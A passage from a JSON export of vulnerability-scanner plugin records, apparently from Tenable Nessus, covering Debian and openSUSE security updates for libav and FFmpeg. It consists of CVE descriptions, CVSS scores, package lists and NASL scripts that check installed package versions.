audit(AUDIT_PACKAGE_NOT_INSTALLED, \"FFmpeg\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T00:20:09", "description": "Several security issues were fixed in libav, a multimedia library for processing audio and video files.\n\nCVE-2017-17127\n\nThe vc1_decode_frame function in libavcodec/vc1dec.c allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted file. CVE-2018-19130 is a duplicate of this vulnerability.\n\nCVE-2017-18245\n\nThe mpc8_probe function in libavformat/mpc8.c allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted audio file on 32-bit systems.\n\nCVE-2018-19128\n\nHeap-based buffer over-read in decode_frame in libavcodec/lcldec.c allows an attacker to cause denial of service via a crafted avi file.\n\nCVE-2019-14443\n\nDivision by zero in range_decode_culshift in libavcodec/apedec.c allows remote attackers to cause a denial of service (application crash), as demonstrated by avconv.\n\nCVE-2019-17542\n\nHeap-based buffer overflow in vqa_decode_chunk because of an out-of-array access in vqa_decode_init in libavcodec/vqavideo.c.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 6:11.12-1~deb8u9.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-12-06T00:00:00", "type": "nessus", "title": "Debian DLA-2021-1 : libav security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17127", "CVE-2017-18245", "CVE-2018-19128", "CVE-2018-19130", "CVE-2019-14443", "CVE-2019-17542"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libav-dbg", "p-cpe:/a:debian:debian_linux:libav-doc", "p-cpe:/a:debian:debian_linux:libav-tools", "p-cpe:/a:debian:debian_linux:libavcodec-dev", "p-cpe:/a:debian:debian_linux:libavcodec-extra", "p-cpe:/a:debian:debian_linux:libavcodec-extra-56", "p-cpe:/a:debian:debian_linux:libavcodec56", "p-cpe:/a:debian:debian_linux:libavdevice-dev", "p-cpe:/a:debian:debian_linux:libavdevice55", "p-cpe:/a:debian:debian_linux:libavfilter-dev", "p-cpe:/a:debian:debian_linux:libavfilter5", "p-cpe:/a:debian:debian_linux:libavformat-dev", "p-cpe:/a:debian:debian_linux:libavformat56", "p-cpe:/a:debian:debian_linux:libavresample-dev", "p-cpe:/a:debian:debian_linux:libavresample2", "p-cpe:/a:debian:debian_linux:libavutil-dev", "p-cpe:/a:debian:debian_linux:libavutil54", "p-cpe:/a:debian:debian_linux:libswscale-dev", "p-cpe:/a:debian:debian_linux:libswscale3", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-2021.NASL", "href": "https://www.tenable.com/plugins/nessus/131740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2021-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131740);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-17127\", \"CVE-2017-18245\", \"CVE-2018-19128\", \"CVE-2018-19130\", \"CVE-2019-14443\", \"CVE-2019-17542\");\n\n script_name(english:\"Debian DLA-2021-1 : libav security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were fixed in libav, a multimedia library for\nprocessing audio and video files.\n\nCVE-2017-17127\n\nThe vc1_decode_frame function in libavcodec/vc1dec.c allows remote\nattackers to cause a denial of service (NULL pointer dereference and\napplication crash) via a crafted file. CVE-2018-19130 is a duplicate\nof this vulnerability.\n\nCVE-2017-18245\n\nThe mpc8_probe function in libavformat/mpc8.c allows remote attackers\nto cause a denial of service (heap-based buffer over-read) via a\ncrafted audio file on 32-bit systems.\n\nCVE-2018-19128\n\nHeap-based buffer over-read in decode_frame in libavcodec/lcldec.c\nallows an attacker to cause denial of service via a crafted avi file.\n\nCVE-2019-14443\n\nDivision by zero in range_decode_culshift in libavcodec/apedec.c\nallows remote attackers to cause a denial of service (application\ncrash), as demonstrated by avconv.\n\nCVE-2019-17542\n\nHeap-based buffer overflow in vqa_decode_chunk because of an\nout-of-array access in vqa_decode_init in libavcodec/vqavideo.c.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u9.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/12/msg00003.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libav\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra-56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libav-dbg\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-doc\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-tools\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra-56\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec56\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice55\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter5\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat56\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample2\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil54\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale-dev\", reference:\"6:11.12-1~deb8u9\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale3\", reference:\"6:11.12-1~deb8u9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-20T14:13:34", "description": "Several security vulnerabilities were corrected in the libav multimedia library which may lead to a denial of service, information disclosure or the execution of arbitrary code if a malformed file is processed.\n\nCVE-2017-9993\n\nLibav does not properly restrict HTTP Live Streaming filename extensions and demuxer names, which allows attackers to read arbitrary files via crafted playlist data.\n\nCVE-2017-9994\n\nlibavcodec/webp.c in Libav does not ensure that pix_fmt is set, which allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to the vp8_decode_mb_row_no_filter and pred8x8_128_dc_8_c functions.\n\nCVE-2017-14055\n\ndenial of service in mv_read_header() due to lack of an EOF (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14056\n\ndenial of service in rl2_read_header() due to lack of an EOF (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14057\n\ndenial of service in asf_read_marker() due to lack of an EOF (End of File) check might cause huge CPU and memory consumption.\n\nCVE-2017-14170\n\ndenial of service in mxf_read_index_entry_array() due to lack of an EOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14171\n\ndenial of service in nsv_parse_NSVf_header() due to lack of an EOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14767\n\nThe sdp_parse_fmtp_config_h264 function in libavformat/rtpdec_h264.c mishandles empty sprop-parameter-sets values, which allows remote attackers to cause a denial of service (heap buffer overflow) or possibly have unspecified other impact via a crafted sdp file.\n\nCVE-2017-15672\n\nThe read_header function in libavcodec/ffv1dec.c allows remote attackers to have unspecified impact via a crafted MP4 file, which triggers an out-of-bounds read.\n\nCVE-2017-17130\n\nThe ff_free_picture_tables function in libavcodec/mpegpicture.c allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to vc1_decode_i_blocks_adv.\n\nCVE-2018-6621\n\nThe decode_frame function in libavcodec/utvideodec.c in Libav allows remote attackers to cause a denial of service (out of array read) via a crafted AVI file.\n\nCVE-2018-7557\n\nThe decode_init function in libavcodec/utvideodec.c in Libav allows remote attackers to cause a denial of service (Out of array read) via an AVI file with crafted dimensions within chroma subsampling data.\n\nCVE-2018-14394\n\nlibavformat/movenc.c in Libav allows attackers to cause a denial of service (application crash caused by a divide-by-zero error) with a user crafted Waveform audio file.\n\nCVE-2018-1999010\n\nLibav contains multiple out of array access vulnerabilities in the mms protocol that can result in attackers accessing out of bound data.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 6:11.12-1~deb8u4.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-08T00:00:00", "type": "nessus", "title": "Debian DLA-1630-1 : libav security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-14055", "CVE-2017-14056", "CVE-2017-14057", "CVE-2017-14170", "CVE-2017-14171", "CVE-2017-14767", "CVE-2017-15672", "CVE-2017-17130", "CVE-2017-9993", "CVE-2017-9994", "CVE-2018-14394", "CVE-2018-1999010", "CVE-2018-6621", "CVE-2018-7557"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libav-dbg", "p-cpe:/a:debian:debian_linux:libav-doc", "p-cpe:/a:debian:debian_linux:libav-tools", "p-cpe:/a:debian:debian_linux:libavcodec-dev", "p-cpe:/a:debian:debian_linux:libavcodec-extra", "p-cpe:/a:debian:debian_linux:libavcodec-extra-56", "p-cpe:/a:debian:debian_linux:libavcodec56", "p-cpe:/a:debian:debian_linux:libavdevice-dev", "p-cpe:/a:debian:debian_linux:libavdevice55", "p-cpe:/a:debian:debian_linux:libavfilter-dev", "p-cpe:/a:debian:debian_linux:libavfilter5", "p-cpe:/a:debian:debian_linux:libavformat-dev", "p-cpe:/a:debian:debian_linux:libavformat56", "p-cpe:/a:debian:debian_linux:libavresample-dev", "p-cpe:/a:debian:debian_linux:libavresample2", "p-cpe:/a:debian:debian_linux:libavutil-dev", "p-cpe:/a:debian:debian_linux:libavutil54", "p-cpe:/a:debian:debian_linux:libswscale-dev", "p-cpe:/a:debian:debian_linux:libswscale3", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1630.NASL", "href": "https://www.tenable.com/plugins/nessus/120988", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1630-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120988);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-14055\", \"CVE-2017-14056\", \"CVE-2017-14057\", \"CVE-2017-14170\", \"CVE-2017-14171\", \"CVE-2017-14767\", \"CVE-2017-15672\", \"CVE-2017-17130\", \"CVE-2017-9993\", \"CVE-2017-9994\", \"CVE-2018-14394\", \"CVE-2018-1999010\", \"CVE-2018-6621\", \"CVE-2018-7557\");\n\n script_name(english:\"Debian DLA-1630-1 : libav security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security vulnerabilities were corrected in the libav\nmultimedia library which may lead to a denial of service, information\ndisclosure or the execution of arbitrary code if a malformed file is\nprocessed.\n\nCVE-2017-9993\n\nLibav does not properly restrict HTTP Live Streaming filename\nextensions and demuxer names, which allows attackers to read arbitrary\nfiles via crafted playlist data.\n\nCVE-2017-9994\n\nlibavcodec/webp.c in Libav does not ensure that pix_fmt is set, which\nallows remote attackers to cause a denial of service (heap-based\nbuffer overflow and application crash) or possibly have unspecified\nother impact via a crafted file, related to the\nvp8_decode_mb_row_no_filter and pred8x8_128_dc_8_c functions.\n\nCVE-2017-14055\n\ndenial of service in mv_read_header() due to lack of an EOF (End of\nFile) check might cause huge CPU and memory consumption.\n\nCVE-2017-14056\n\ndenial of service in rl2_read_header() due to lack of an EOF (End of\nFile) check might cause huge CPU and memory consumption.\n\nCVE-2017-14057\n\ndenial of service in asf_read_marker() due to lack of an EOF (End of\nFile) check might cause huge CPU and memory consumption.\n\nCVE-2017-14170\n\ndenial of service in mxf_read_index_entry_array() due to lack of an\nEOF (End of File) check might cause huge CPU consumption.\n\nCVE-2017-14171\n\ndenial of service in nsv_parse_NSVf_header() due to lack of an EOF\n(End of File) check might cause huge CPU consumption.\n\nCVE-2017-14767\n\nThe sdp_parse_fmtp_config_h264 function in libavformat/rtpdec_h264.c\nmishandles empty sprop-parameter-sets values, which allows remote\nattackers to cause a denial of service (heap buffer overflow) or\npossibly have unspecified other impact via a crafted sdp file.\n\nCVE-2017-15672\n\nThe read_header function in libavcodec/ffv1dec.c allows remote\nattackers to have unspecified impact via a crafted MP4 file, which\ntriggers an out-of-bounds read.\n\nCVE-2017-17130\n\nThe ff_free_picture_tables function in libavcodec/mpegpicture.c allows\nremote attackers to cause a denial of service (heap-based buffer\noverflow and application crash) or possibly have unspecified other\nimpact via a crafted file, related to vc1_decode_i_blocks_adv.\n\nCVE-2018-6621\n\nThe decode_frame function in libavcodec/utvideodec.c in Libav allows\nremote attackers to cause a denial of service (out of array read) via\na crafted AVI file.\n\nCVE-2018-7557\n\nThe decode_init function in libavcodec/utvideodec.c in Libav allows\nremote attackers to cause a denial of service (Out of array read) via\nan AVI file with crafted dimensions within chroma subsampling data.\n\nCVE-2018-14394\n\nlibavformat/movenc.c in Libav allows attackers to cause a denial of\nservice (application crash caused by a divide-by-zero error) with a\nuser crafted Waveform audio file.\n\nCVE-2018-1999010\n\nLibav contains multiple out of array access vulnerabilities in the mms\nprotocol that can result in attackers accessing out of bound data.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n6:11.12-1~deb8u4.\n\nWe recommend that you upgrade your libav packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/01/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libav\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libav-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec-extra-56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavcodec56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavdevice55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavfilter5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavformat56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavresample2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libavutil54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libswscale3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libav-dbg\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-doc\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libav-tools\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec-extra-56\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavcodec56\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavdevice55\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavfilter5\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavformat56\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavresample2\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libavutil54\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale-dev\", reference:\"6:11.12-1~deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libswscale3\", reference:\"6:11.12-1~deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T00:27:33", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:2322-1 advisory.\n\n - In FFmpeg before 4.2, avcodec_open2 in libavcodec/utils.c allows a NULL pointer dereference and possibly unspecified other impact when there is no valid close function pointer. (CVE-2019-17539)\n\n - FFmpeg 2.8 and 4.2.3 has a use-after-free via a crafted EXTINF duration in an m3u8 file because parse_playlist in libavformat/hls.c frees a pointer, and later that pointer is accessed in av_probe_input_format3 in libavformat/format.c. (CVE-2020-13904)\n\n - FFmpeg 4.1.3 is affected by a Divide By Zero issue via libavcodec/ratecontrol.c, which allows a remote malicious user to cause a Denial of Service. (CVE-2020-20448)\n\n - Denial of Service issue in FFmpeg 4.2 due to resource management errors via fftools/cmdutils.c.\n (CVE-2020-20451)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.1 via apng_do_inverse_blend in libavcodec/pngenc.c, which could let a remote malicious user cause a Denial of Service (CVE-2020-21041)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in mov_write_video_tag due to the out of bounds in libavformat/movenc.c, which could let a remote malicious user obtain sensitive information, cause a Denial of Service, or execute arbitrary code. (CVE-2020-22015)\n\n - A heap-based Buffer Overflow vulnerability in FFmpeg 4.2 at libavcodec/get_bits.h when writing .mov files, which might lead to memory corruption and other potential consequences. (CVE-2020-22016)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at ff_fill_rectangle in libavfilter/drawutils.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22017)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at convolution_y_10bit in libavfilter/vf_vmafmotion.c, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22019)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 in the build_diff_map function in libavfilter/vf_fieldmatch.c, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22020)\n\n - Buffer Overflow vulnerability in FFmpeg 4.2 at filter_edges function in libavfilter/vf_yadif.c, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22021)\n\n - A heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 in filter_frame at libavfilter/vf_fieldorder.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22022)\n\n - A heap-based Buffer Overflow vulnerabililty exists in FFmpeg 4.2 in filter_frame at libavfilter/vf_bitplanenoise.c, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22023)\n\n - A heap-based Buffer Overflow vulnerability exists in gaussian_blur at libavfilter/vf_edgedetect.c, which might lead to memory corruption and other potential consequences. (CVE-2020-22025)\n\n - Buffer Overflow vulnerability exists in FFmpeg 4.2 in the config_input function at libavfilter/af_tremolo.c, which could let a remote malicious user cause a Denial of Service.\n (CVE-2020-22026)\n\n - A Heap-based Buffer Overflow vulnerability exists in FFmpeg 4.2 at libavfilter/vf_w3fdif.c in filter16_complex_low, which might lead to memory corruption and other potential consequences.\n (CVE-2020-22031)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at libavfilter/vf_edgedetect.c in gaussian_blur, which might lead to memory corruption and other potential consequences. (CVE-2020-22032)\n\n - A heap-based Buffer Overflow Vulnerability exists FFmpeg 4.2 at libavfilter/vf_vmafmotion.c in convolution_y_8bit, which could let a remote malicious user cause a Denial of Service. (CVE-2020-22033)\n\n - A heap-based Buffer Overflow vulnerability exists FFmpeg 4.2 at 